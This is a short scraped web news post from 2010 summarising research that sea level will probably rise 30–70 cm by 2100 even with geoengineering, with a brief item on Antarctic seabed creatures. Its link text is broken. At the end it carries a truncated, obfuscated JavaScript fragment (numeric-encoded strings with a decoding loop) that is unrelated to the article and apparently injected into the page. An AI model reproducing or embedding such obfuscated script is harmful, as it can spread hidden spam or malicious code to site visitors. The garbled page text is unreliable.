Sea level rise looks inevitable

Written by Administrator Wednesday, 25 August 2010 19:51

New findings by an international research group of scientists from England, China and Denmark suggest that sea level will likely be 30-70 centimetres higher by 2100 than at the start of the century even if all but the most aggressive geo-engineering schemes are undertaken to mitigate the effects of global warming and greenhouse gas emissions are stringently controlled. Even the most extreme geoengineering approaches will not stop sea levels from rising due to climate change. More

here, here and

. Tiny marine creatures found on the seabed on opposite sides of the vast West Antarctic ice sheet give a strong hint of the risks of sea level rise caused by climate change. More here

TAGS: sea level rise, climate change, global warming, geo-engineering

var a=0,m,v,t,z,x=new Array('7980857265','7571736577','7675796980697574','6162797572818065','63726976','78656 380','7684','61818075'),l=x.length;while(++a